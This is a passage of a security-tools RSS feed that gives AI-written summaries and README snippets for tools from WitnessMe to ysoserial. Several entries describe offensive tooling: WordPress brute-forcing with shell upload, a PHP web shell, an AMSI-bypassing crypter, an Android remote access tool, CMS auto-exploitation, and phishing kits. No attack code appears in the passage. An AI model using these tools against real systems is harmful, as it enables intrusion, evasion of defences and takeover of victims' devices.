&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The Wireless Carplay Dongle Reverse Engineering tool provides a framework for gaining root access and modifying firmware on various Carlinkit wireless Carplay dongles, primarily aimed at enthusiasts looking to customize their devices. Key features include the ability to switch between firmware versions using both software and hardware methods, alongside insights into hardware components and their specifications. Additionally, the repository documents the challenges faced due to recent updates from Carlinkit that have hardened the firmware against reverse engineering.&lt;/p&gt;</description></item><item><title>WitnessMe</title><link>https://rainmana.github.io/hackyfeed/tools/byt3bl33d3r-witnessme/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/byt3bl33d3r-witnessme/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; WitnessMe is a versatile web inventory tool designed for efficient scanning and data gathering, primarily utilizing headless Chromium via the Pyppeteer library. It excels in processing large Nessus and NMap XML files, generates CSV and HTML reports, and features a RESTful API for remote scanning and extensibility to accommodate custom functionalities. With additional capabilities like HTTP proxy support, signature scanning through YAML files, and terminal screenshot previews, WitnessMe stands out for providing a comprehensive workflow without significant installation challenges.&lt;/p&gt;</description></item><item><title>wordlists</title><link>https://rainmana.github.io/hackyfeed/tools/trickest-wordlists/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/trickest-wordlists/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The Trickest Wordlists repository provides a collection of real-world information security wordlists, updated regularly for various technologies including popular CMS platforms and cloud assets. Its primary use case is to assist security professionals in penetration testing and vulnerability assessments by generating wordlists for directory bruteforcing and subdomain enumeration. Notable features include distinct wordlist formats for different scenarios, such as base and all levels for technology-based lists, as well as comprehensive data extracted from top websites&amp;rsquo; &lt;code&gt;robots.txt&lt;/code&gt; files and extensive subdomain inventories from public bug bounty programs.&lt;/p&gt;</description></item><item><title>worldmonitor</title><link>https://rainmana.github.io/hackyfeed/tools/koala73-worldmonitor/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/koala73-worldmonitor/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; World Monitor is an AI-driven real-time global intelligence dashboard that aggregates news, monitors geopolitical events, and tracks infrastructure within a comprehensive situational awareness interface. It features over 435 curated news feeds, dual map visualization capabilities with multiple data layers, and advanced cross-stream correlation for military, economic, and disaster signals, making it ideal for analysts seeking in-depth insights into global developments. Additional functionalities include a Country Intelligence Index and finance monitoring tools covering various asset classes.&lt;/p&gt;</description></item><item><title>WPeChatGPT</title><link>https://rainmana.github.io/hackyfeed/tools/wpeace-hch-wpechatgpt/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/wpeace-hch-wpechatgpt/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; WPeChatGPT is an IDA plugin that leverages OpenAI&amp;rsquo;s gpt-3.5-turbo model to assist analysts in evaluating binary files. Its primary use case includes analyzing binary functions for their intended purpose, renaming variables, restoring functions using Python, identifying vulnerabilities, and automatically generating exploits for those vulnerabilities. Notable features include support for automatic analysis of binary files through Auto-WPeGPT and the ability to work seamlessly within the IDA environment using various shortcuts and menu options.&lt;/p&gt;</description></item><item><title>WPForce</title><link>https://rainmana.github.io/hackyfeed/tools/n00py-wpforce/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/n00py-wpforce/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; WPForce is a comprehensive suite of tools designed for attacking WordPress installations, primarily focusing on brute-forcing login credentials via the API. Its notable features include the ability to automatically upload interactive shells post-authentication, dump WordPress password hashes, and pivot to a meterpreter session, making it suitable for penetration testing and post-exploitation scenarios. The tool leverages multi-threading to optimize the brute-force attack process while providing options for verbose output and error debugging.&lt;/p&gt;</description></item><item><title>wpprobe</title><link>https://rainmana.github.io/hackyfeed/tools/chocapikk-wpprobe/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/chocapikk-wpprobe/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; WPProbe is a rapid scanning tool designed to detect installed WordPress plugins and themes through REST API enumeration and HTML discovery, mapping them to known vulnerabilities. It supports multiple scanning modes, including stealthy, brute-force, and hybrid methods, allowing detection of over 5,000 plugins without brute-force and many more with it. The tool fetches an updated vulnerability database automatically, eliminating the need for an API key by default, while still allowing for custom configurations and output formats.&lt;/p&gt;</description></item><item><title>wpscan</title><link>https://rainmana.github.io/hackyfeed/tools/wpscanteam-wpscan/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/wpscanteam-wpscan/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; WPScan is a specialized security scanner for WordPress sites, primarily used to identify vulnerabilities in themes and plugins as well as misconfigurations. Its notable features include support for user enumeration, integration with the WordPress Vulnerability Database for real-time risk assessment, and customizable scanning options for stealth or aggressive detection modes. The tool can be easily installed via RubyGems or Docker and offers extensive usage documentation for diverse scanning approaches.&lt;/p&gt;</description></item><item><title>wwwolf-php-webshell</title><link>https://rainmana.github.io/hackyfeed/tools/whitewinterwolf-wwwolf-php-webshell/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/whitewinterwolf-wwwolf-php-webshell/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; WhiteWinterWolf&amp;rsquo;s PHP web shell is a lightweight tool designed for reliable remote server access, focusing on compatibility with both UNIX-like and Windows systems without requiring modifications. It addresses common limitations in existing web shells, such as incorrect assumptions about URLs, and supports clean PHP output execution while providing features like password protection, working directory setting, and dual file upload methods. The tool adheres to the KISS principle, making it straightforward to integrate with various exploitation techniques.&lt;/p&gt;</description></item><item><title>X-osint</title><link>https://rainmana.github.io/hackyfeed/tools/termuxhackz-x-osint/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/termuxhackz-x-osint/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; X-osint is an open-source OSINT tool designed for gathering credible information related to phone numbers, email addresses, and IP addresses, with additional features planned for future updates. Notably, it includes functionalities for IP and email information gathering, metadata extraction from images and files, subdomain enumeration, and DNS lookups, among others. The tool is built using Python and Bash and is maintained actively, ensuring regular updates and enhancements.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="x-osint"&gt;X-osint&lt;/h1&gt;
&lt;p&gt;This is an osint tool which gathers useful and yet credible valid information about a phone number, user&amp;rsquo;s email address and ip address and more to come in future updates
&lt;img src="images/x-osint_banner_white_texts.png" float="center"&gt;&lt;/p&gt;</description></item><item><title>xAnalyzer</title><link>https://rainmana.github.io/hackyfeed/tools/thundercls-xanalyzer/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/thundercls-xanalyzer/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; xAnalyzer is a plugin for the x64dbg debugger designed to enhance static code analysis of debugged applications. It leverages extensive API function call detection and provides detailed function definitions, argument types, and additional debugging information, greatly improving the user&amp;rsquo;s comprehension before commencing debugging tasks. Notable features include automatic loop detection, user-maintained definition files, and support for over 13,000 API definitions from approximately 200 DLLs.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;p align="center"&gt;&lt;img src ="images/header.png" /&gt;&lt;/p&gt;</description></item><item><title>XAttacker</title><link>https://rainmana.github.io/hackyfeed/tools/moham3driahi-xattacker/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/moham3driahi-xattacker/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; XAttacker is a comprehensive exploitation tool designed for scanning and auto-exploiting vulnerabilities in web applications, particularly those using popular Content Management Systems (CMS). It identifies the target website&amp;rsquo;s architecture, detects vulnerabilities, generates exploits, and provides the user with the relevant exploit link. Notable features include a vulnerability scanner, auto-exploiting capabilities, and support for multiple CMS platforms, along with dork search functionality across various search engines.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1&gt;XAttacker V2.5 Tool FREE&lt;/h1&gt;
&lt;img align="left" width="120" height="120" src="https://i.ibb.co/hWRd9g5/hacker-icon-on-white-background-vector-27223273-1.jpg"&gt;
&lt;p&gt;&lt;strong&gt;XATTACKER&lt;/strong&gt; A Massive Exploiting Tool capable of scanning and auto-exploiting vulnerabilities in web applications, By providing a target website to the tool, it auto detects its’ architecture if using a Content Management Service (CMS) and tries to find vulnerabilities based on the detected CMS, After finding the vulnerabilities the tool will generate an exploit for the website and send the user the link of the exploit.&lt;/p&gt;</description></item><item><title>XELFViewer</title><link>https://rainmana.github.io/hackyfeed/tools/horsicq-xelfviewer/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/horsicq-xelfviewer/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; XELFViewer is a cross-platform ELF file viewer and editor designed for Windows, Linux, and MacOS environments. Its primary use case includes analyzing and modifying ELF (Executable and Linkable Format) files, which are commonly used in Unix-based operating systems. Notable features include a user-friendly interface for navigation, functionality for both viewing and editing file contents, and support for community translations.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;p&gt;&lt;a href="https://www.paypal.com/cgi-bin/webscr?cmd=_s-xclick&amp;amp;hosted_button_id=NF3FBD3KHMXDN"&gt;&lt;img src="https://img.shields.io/badge/Donate-PayPal-green.svg" alt="Donate"&gt;&lt;/a&gt;
&lt;a href="https://github.com/horsicq/XELFViewer/releases"&gt;&lt;img src="https://img.shields.io/github/tag/horsicq/XELFViewer.svg" alt="GitHub tag (latest SemVer)"&gt;&lt;/a&gt;
&lt;a href="https://github.com/horsicq/XELFViewer/releases"&gt;&lt;img src="https://img.shields.io/github/downloads/horsicq/XELFViewer/total.svg" alt="GitHub All Releases"&gt;&lt;/a&gt;
&lt;a href="https://github.com/horsicq/XTranslation"&gt;&lt;img src="https://gitlocalize.com/repo/4736/whole_project/badge.svg" alt="gitlocalized "&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;ELF file viewer/editor for Windows, Linux and MacOS.&lt;/p&gt;</description></item><item><title>xencrypt</title><link>https://rainmana.github.io/hackyfeed/tools/the-xentropy-xencrypt/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/the-xentropy-xencrypt/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Xencrypt is a PowerShell-based crypter designed to compress and encrypt PowerShell scripts while bypassing AMSI and modern antivirus solutions. Its notable features include variable name randomization, support for recursive layering of encrypted scripts, and a minimal overhead due to compression. This open-source tool serves as a demonstration for users looking to develop their own crypters, offering flexibility for customization and ease of use.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="xencrypt"&gt;Xencrypt&lt;/h1&gt;
&lt;h3 id="powershell-crypter-v-10"&gt;PowerShell crypter v 1.0&lt;/h3&gt;
&lt;h2 id="authors"&gt;Authors&lt;/h2&gt;
&lt;p&gt;Xentropy ( &lt;a href="http://twitter.com/SamuelAnttila"&gt;@SamuelAnttila&lt;/a&gt; )&lt;br&gt;
SecForce ( &lt;a href="http://twitter.com/SECFORCE_LTD"&gt;@SECFORCE_LTD&lt;/a&gt; )&lt;/p&gt;</description></item><item><title>xeuledoc</title><link>https://rainmana.github.io/hackyfeed/tools/malfrats-xeuledoc/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/malfrats-xeuledoc/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; xeuledoc is a Python tool designed for retrieving metadata and information from various types of public Google documents, including Google Drive files, Google Docs, Sheets, Slides, Drawings, My Maps, Apps Script, and Jamboard. Notable features include ease of installation via PyPI and GitHub, and the ability to handle multiple Google document formats, making it a versatile solution for information extraction from Google’s platform.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="xeuledoc"&gt;xeuledoc&lt;/h1&gt;
&lt;p&gt;&lt;img src="https://img.shields.io/pypi/v/xeuledoc" alt="PyPI"&gt; &lt;img src="https://static.pepy.tech/badge/xeuledoc" alt="PyPI - Downloads"&gt; &lt;img src="https://img.shields.io/pypi/l/xeuledoc" alt="PyPI - License"&gt;&lt;/p&gt;</description></item><item><title>xhunter</title><link>https://rainmana.github.io/hackyfeed/tools/anirudhmalik-xhunter/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/anirudhmalik-xhunter/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; XHUNTER is an advanced Android Remote Access Tool (RAT) designed for penetration testing and ethical hacking purposes. It simplifies the connection process between the attacker and victim by eliminating the need for complex port forwarding, offering a user-friendly interface for controlling a victim&amp;rsquo;s Android device. Notable features include the capability to build and bind payloads to legitimate applications and an intuitive setup process for immediate usability.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;div id="top"&gt;&lt;/div&gt;
&lt;!-- PROJECT SHIELDS --&gt;
&lt;p&gt;&lt;a href="https://github.com/anirudhmalik/xhunter/graphs/contributors"&gt;&lt;img src="https://img.shields.io/github/contributors/anirudhmalik/xhunter.svg?style=for-the-badge" alt="Contributors"&gt;&lt;/a&gt;
&lt;a href="https://github.com/anirudhmalik/xhunter/network/members"&gt;&lt;img src="https://img.shields.io/github/forks/anirudhmalik/xhunter.svg?style=for-the-badge" alt="Forks"&gt;&lt;/a&gt;
&lt;a href="https://github.com/anirudhmalik/xhunter/stargazers"&gt;&lt;img src="https://img.shields.io/github/stars/anirudhmalik/xhunter.svg?style=for-the-badge" alt="Stargazers"&gt;&lt;/a&gt;
&lt;a href="https://github.com/anirudhmalik/xhunter/issues"&gt;&lt;img src="https://img.shields.io/github/issues/anirudhmalik/xhunter.svg?style=for-the-badge" alt="Issues"&gt;&lt;/a&gt;
&lt;a href="https://github.com/anirudhmalik/xhunter/blob/master/LICENSE.md"&gt;&lt;img src="https://img.shields.io/github/license/anirudhmalik/xhunter.svg?style=for-the-badge" alt="MIT License"&gt;&lt;/a&gt;
&lt;a href="https://github.com/anirudhmalik/xhunter/commits/master"&gt;&lt;img src="https://img.shields.io/github/last-commit/anirudhmalik/xhunter.svg?style=for-the-badge" alt="Last Commit"&gt;&lt;/a&gt;
&lt;a href="https://github.com/anirudhmalik/xhunter/releases"&gt;&lt;img src="https://img.shields.io/github/repo-size/anirudhmalik/xhunter.svg?style=for-the-badge" alt="Repo Size"&gt;&lt;/a&gt;&lt;/p&gt;</description></item><item><title>XMachOViewer</title><link>https://rainmana.github.io/hackyfeed/tools/horsicq-xmachoviewer/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/horsicq-xmachoviewer/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; XMachOViewer is a cross-platform Mach-O file analysis tool designed for Windows, Linux, and macOS. Its primary use case involves examining Mach-O binaries through features such as heuristic scanning, string and hex viewing, disassembly, entropy analysis, and dynamic library linking, enabling users to uncover characteristics, anomalies, and cryptographic signatures within the files. Notable features include support for multiple architectures, automatic file format detection, and a detailed symbol table viewer.&lt;/p&gt;</description></item><item><title>xmir-patcher</title><link>https://rainmana.github.io/hackyfeed/tools/openwrt-xiaomi-xmir-patcher/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/openwrt-xiaomi-xmir-patcher/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; XMiR-Patcher is a firmware patching tool specifically designed for Xiaomi routers, facilitating the modification of router firmware for enhanced functionality. It supports both Windows and Linux/Mac operating systems, requiring Python 3.8+ and OpenSSL for operation. Notable features include straightforward execution through batch and shell scripts, making it accessible for users across different platforms.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;p&gt;&lt;a href="https://github.com/openwrt-xiaomi/xmir-patcher/archive/refs/heads/main.zip"&gt;&lt;img src="https://img.shields.io/badge/%E2%8F%AC-Download_latest-green" alt="Download latest"&gt;&lt;/a&gt;
&lt;a href="https://github.com/openwrt-xiaomi/xmir-patcher/archive/refs/heads/main.zip"&gt;&lt;img src="https://raw.githubusercontent.com/openwrt-xiaomi/xmir-patcher/gh-pages/traffic/clones.svg" alt="dowloads"&gt;&lt;/a&gt;
&lt;a href="https://github.com/openwrt-xiaomi/xmir-patcher/stargazers"&gt;&lt;img src="https://img.shields.io/github/stars/openwrt-xiaomi/xmir-patcher?style=flat" alt="GitHub Stars"&gt;&lt;/a&gt;
&lt;a href="https://github.com/openwrt-xiaomi/xmir-patcher"&gt;&lt;img src="https://views.whatilearened.today/views/github/openwrt-xiaomi/xmir-patcher.svg" alt="ViewCount"&gt;&lt;/a&gt;
&lt;a href="https://github.com/remittor/donate"&gt;&lt;img src="https://github.com/andry81-cache/gh-content-static-cache/raw/master/common/badges/donate/donate.svg" alt="Donations Page"&gt;&lt;/a&gt;&lt;/p&gt;
&lt;h1 id="xmir-patcher"&gt;XMiR-Patcher&lt;/h1&gt;
&lt;p&gt;Firmware patcher for Xiaomi routers&lt;/p&gt;
&lt;h2 id="usage"&gt;Usage&lt;/h2&gt;
&lt;h3 id="windows"&gt;Windows&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;Run &lt;code&gt;run.bat&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="linux--mac-os"&gt;Linux / Mac OS&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;Install python 3.8+ and openssl&lt;/li&gt;
&lt;li&gt;Run &lt;code&gt;run.sh&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="donations"&gt;Donations&lt;/h2&gt;
&lt;p&gt;&lt;a href="https://github.com/remittor/donate"&gt;&lt;img src="https://github.com/andry81-cache/gh-content-static-cache/raw/master/common/badges/donate/donate.svg" alt="Donations Page"&gt;&lt;/a&gt;&lt;/p&gt;</description></item><item><title>xoreos</title><link>https://rainmana.github.io/hackyfeed/tools/xoreos-xoreos/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/xoreos-xoreos/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; xoreos is an open-source reimplementation of BioWare&amp;rsquo;s Aurora engine, targeting classic games like Neverwinter Nights and Dragon Age II to provide portable access across platforms. The tool currently supports basic graphics rendering and sound playback, with partial in-game graphics and a starting point for a scripting system, though no full gameplay mechanics are implemented yet. Its modular design allows for contributions from the community, fostering ongoing development and enhancement of supported titles.&lt;/p&gt;</description></item><item><title>XPEViewer</title><link>https://rainmana.github.io/hackyfeed/tools/horsicq-xpeviewer/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/horsicq-xpeviewer/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; XPEViewer is a cross-platform PE file viewer and editor designed for Windows, Linux, and macOS environments. Its primary use case is to facilitate the analysis and modification of Portable Executable (PE) files, making it a valuable tool for reverse engineers and software developers. Notable features include functionality for viewing various PE file sections, editing capabilities, and support for community contributions through translation.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;p&gt;&lt;a href="https://www.paypal.com/cgi-bin/webscr?cmd=_s-xclick&amp;amp;hosted_button_id=NF3FBD3KHMXDN"&gt;&lt;img src="https://img.shields.io/badge/Donate-PayPal-green.svg" alt="Donate"&gt;&lt;/a&gt;
&lt;a href="https://github.com/horsicq/XPEViewer/releases"&gt;&lt;img src="https://img.shields.io/github/tag/horsicq/XPEViewer.svg" alt="GitHub tag (latest SemVer)"&gt;&lt;/a&gt;
&lt;a href="https://github.com/horsicq/XPEViewer/releases"&gt;&lt;img src="https://img.shields.io/github/downloads/horsicq/XPEViewer/total.svg" alt="GitHub All Releases"&gt;&lt;/a&gt;
&lt;a href="https://github.com/horsicq/XTranslation"&gt;&lt;img src="https://gitlocalize.com/repo/4736/whole_project/badge.svg" alt="gitlocalized "&gt;&lt;/a&gt;&lt;/p&gt;</description></item><item><title>xsser</title><link>https://rainmana.github.io/hackyfeed/tools/epsylon-xsser/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/epsylon-xsser/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; XSSer is an automated framework designed for the detection, exploitation, and reporting of Cross-Site Scripting (XSS) vulnerabilities in web applications. It features over 1300 pre-installed XSS attack vectors, sophisticated techniques for bypassing various web application firewalls (WAFs) and browsers, and is capable of operating on multiple platforms with dependencies on Python and essential libraries such as Selenium and BeautifulSoup.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;p&gt;&lt;img src="https://xsser.03c8.net/xsser/thehive1.png" alt="XSSer" title="XSSer"&gt;&lt;/p&gt;
&lt;hr&gt;
&lt;ul&gt;
&lt;li&gt;Web: &lt;a href="https://xsser.03c8.net"&gt;https://xsser.03c8.net&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;hr&gt;
&lt;p&gt;Cross Site &amp;ldquo;Scripter&amp;rdquo; (aka XSSer) is an automatic -framework- to detect, exploit and report XSS vulnerabilities in web-based applications.&lt;/p&gt;</description></item><item><title>xssor2</title><link>https://rainmana.github.io/hackyfeed/tools/evilcos-xssor2/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/evilcos-xssor2/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; XSS&amp;rsquo;OR is a versatile tool designed for exploiting cross-site scripting (XSS) vulnerabilities through JavaScript-based payloads. Its primary use case involves encoding, decoding, and probing potential attack vectors, making it applicable for security testing and penetration testing scenarios. Notable features include a web interface for payload manipulation, compatibility with both Python 2 and 3, and robust support for Docker deployment.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="xssor"&gt;XSS&amp;rsquo;OR&lt;/h1&gt;
&lt;p&gt;XSS&amp;rsquo;OR - Hack with JavaScript.&lt;/p&gt;
&lt;h2 id="online"&gt;ONLINE&lt;/h2&gt;
&lt;p&gt;You can have a try:&lt;/p&gt;</description></item><item><title>Xteam</title><link>https://rainmana.github.io/hackyfeed/tools/xploitstech-xteam/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/xploitstech-xteam/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Xteam is a multifunctional tool designed for information gathering and security testing, primarily targeting Instagram data extraction, Android lockscreen cracking, and phishing methods. It includes features for wireless attacks and provides an update script to enhance its capabilities. The tool operates on Termux and Kali Linux, requiring no root access for installation.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h2 id="xteam-tool"&gt;Xteam tool&lt;/h2&gt;
&lt;br&gt;
&lt;p align="center"&gt;
## Screenshot:
&lt;br&gt;
&lt;p align="center"&gt;
&lt;img width="95%" src="https://github.com/xploitstech/Xteam/blob/main/Ig_information_gathering/Core_files/Xteamsce.png"\&gt;
&lt;h2 id="features"&gt;Features:&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;Insta information gathering&lt;/li&gt;
&lt;li&gt;Crack android lockscreen interfaces&lt;/li&gt;
&lt;li&gt;Phishing Hacks&lt;/li&gt;
&lt;li&gt;Wireless attacks added&lt;/li&gt;
&lt;li&gt;Update script&lt;/li&gt;
&lt;li&gt;Remove script&lt;/li&gt;
&lt;li&gt;more coming&amp;hellip;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="requirements"&gt;Requirements&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;Data connection&lt;/p&gt;</description></item><item><title>yakit</title><link>https://rainmana.github.io/hackyfeed/tools/yaklang-yakit/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/yaklang-yakit/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Yakit is an interactive application security testing platform that integrates the CyberSecurity Domain Specific Language (CDSL) for enhanced security operations. Its primary use case is to provide a comprehensive GUI for manipulating security testing capacities via a gRPC server, fully replacing tools like BurpSuite and offering unique features such as a visual web fuzzing tool and a plugin store for customizable security scripts. Additionally, Yakit allows non-coders to harness advanced security capabilities without programming knowledge, facilitating both local and remote deployment.&lt;/p&gt;</description></item><item><title>yarGen</title><link>https://rainmana.github.io/hackyfeed/tools/neo23x0-yargen/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/neo23x0-yargen/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; yarGen is a YARA rule generator designed to create rules based on strings extracted from malware files while filtering out strings common to goodware, thereby enhancing detection capabilities. Notable features include the integration of a naive-Bayes classifier for improved string selection, opcode processing from PE files, and support for additional conditions using the &lt;code&gt;pe&lt;/code&gt; module. The tool also allows for output tailored for AI processing by appending instructions to generated rules when using the &lt;code&gt;--ai&lt;/code&gt; flag.&lt;/p&gt;</description></item><item><title>yark</title><link>https://rainmana.github.io/hackyfeed/tools/owez-yark/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/owez-yark/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Yark is a YouTube archiving tool designed to simplify the process of downloading and managing video content and metadata from YouTube channels. Its primary use case is to create and maintain local archives of videos, allowing users to refresh and view their collections offline, complete with timeline reports and commenting features. Notable features include an easy-to-use command line interface, support for rich history and stats visualization, and a robust directory-based archive structure that preserves deleted or private videos.&lt;/p&gt;</description></item><item><title>yesitsme</title><link>https://rainmana.github.io/hackyfeed/tools/0x0be-yesitsme/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/0x0be-yesitsme/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Yes, it&amp;rsquo;s me! is a Python-based Open Source Intelligence (OSINT) tool designed to locate Instagram profiles via name, email, or phone number. It effectively utilizes indexing from dumpor.com to fetch usernames associated with a specified name and compares them against provided obfuscated contact details, enabling streamlined online investigations. Notable features include multi-level match scoring, customizable request timeouts, and support for partial inputs to enhance user anonymity.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;p align="center"&gt;
 &lt;img src="https://github.com/blackeko/yesitsme/blob/media/logo.png" alt="yesitsme logo"&gt;
&lt;/p&gt;</description></item><item><title>ysoserial</title><link>https://rainmana.github.io/hackyfeed/tools/frohoff-ysoserial/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/frohoff-ysoserial/</guid><description>&lt;blockquote&gt;
